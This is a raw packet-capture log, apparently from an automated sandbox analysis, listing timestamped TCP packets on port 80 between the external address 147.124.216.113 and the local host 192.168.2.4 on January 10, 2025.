Jan 10, 2025 08:59:03.742538929 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742553949 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742564917 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.742573977 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.742593050 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.776473045 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776539087 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776597023 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776598930 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.776612043 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776647091 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776662111 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776662111 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.776695013 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.776768923 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776783943 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776798010 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776812077 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.776814938 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.776859045 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.776988029 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777003050 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777019024 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777033091 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777035952 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777049065 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777062893 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777066946 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777076960 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777100086 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777267933 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777282000 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777297020 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777299881 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777307987 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777322054 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777329922 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777337074 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777350903 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777364969 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777373075 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777393103 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777575016 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777589083 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777602911 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777617931 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777642965 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777741909 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777755976 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777769089 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777782917 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777785063 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777797937 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777812958 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777817011 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777827024 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777842045 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777851105 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777854919 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777869940 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777883053 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777885914 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777899981 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777900934 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.777915001 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.777937889 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.778307915 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.778321981 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.778335094 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:03.778351068 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:03.778369904 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726177931 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726221085 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726279020 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726330042 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726362944 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726372004 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726372957 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726413965 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726447105 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726457119 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726480961 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726512909 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726524115 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726546049 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726583958 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726596117 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726632118 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726664066 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726670027 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726700068 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726727962 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726747036 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726758957 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726794004 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726794958 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726825953 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726859093 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726871014 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726912975 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726944923 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.726952076 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.726977110 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727010012 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727010965 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727049112 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727082014 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727089882 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727114916 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727148056 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727153063 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727180004 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727215052 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727225065 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727370977 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727402925 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727416039 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727437019 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727468967 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727478027 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727502108 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727535963 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727545023 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727570057 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727602959 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727612972 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727636099 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727667093 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727674007 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727703094 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727744102 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727855921 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727888107 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727920055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727930069 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.727952957 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727986097 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.727993965 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728018045 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728049994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728059053 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728082895 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728116989 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728120089 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728148937 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728182077 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728182077 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728260994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728292942 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728300095 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728327036 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728358030 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728360891 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728389978 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728423119 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728429079 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728455067 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728492975 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728581905 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728614092 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728646994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728653908 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728678942 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728718996 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728741884 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728775024 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728806973 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728816032 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728838921 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728872061 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728878975 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728905916 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728938103 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.728945017 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.728971004 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729002953 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729011059 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729037046 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729074955 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729084969 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729383945 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729417086 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729428053 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729449987 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729481936 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729491949 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729515076 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729547024 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729552984 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729578972 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729610920 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729614973 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729644060 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729674101 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729675055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729708910 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729739904 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729753017 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729773045 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729804993 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729809046 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729837894 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.729873896 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.729875088 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730134010 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730165958 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730190992 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.730199099 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730231047 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730242014 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.730263948 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730295897 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730304003 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.730329037 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730360985 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730370045 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.730393887 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730424881 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730432034 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.730458021 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730489016 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730489969 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.730521917 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.730562925 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.765203953 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765249014 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765304089 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765338898 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765372038 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765405893 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.765407085 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.765443087 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765477896 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765491009 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.765510082 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765544891 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765552998 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:05.765580893 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:05.765620947 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.250960112 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251010895 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251046896 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251080990 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251115084 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251147985 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251158953 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251158953 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251182079 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251214027 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251241922 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251249075 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251257896 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251281023 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251336098 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251349926 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251369953 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251403093 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251418114 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251434088 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251467943 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251492023 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251502991 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251534939 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251548052 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251568079 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251599073 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251626968 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251631021 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251667976 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251672983 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251836061 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251869917 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251895905 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251903057 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251935005 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.251948118 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.251969099 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252002001 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252022982 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252033949 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252065897 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252073050 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252099037 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252130032 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252161026 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252165079 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252218962 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252368927 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252402067 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252434015 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252448082 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252466917 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252516985 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252540112 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252573967 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252615929 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252624989 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252660990 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252693892 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252702951 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252727032 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252758980 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252767086 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252790928 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252823114 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252849102 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252856970 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252892017 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252903938 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252923965 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252958059 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.252971888 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.252989054 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.253021955 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.253034115 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.253055096 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.253088951 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.253097057 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.253117085 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.253173113 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:07.253252029 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.253285885 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:07.253335953 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402240038 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402302980 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402339935 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402373075 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402406931 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402439117 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402472973 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402506113 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402512074 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402513027 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402513027 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402539015 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402570963 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402606010 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402638912 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402672052 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402678967 CET	49736	80	192.168.2.4	147.124.216.113
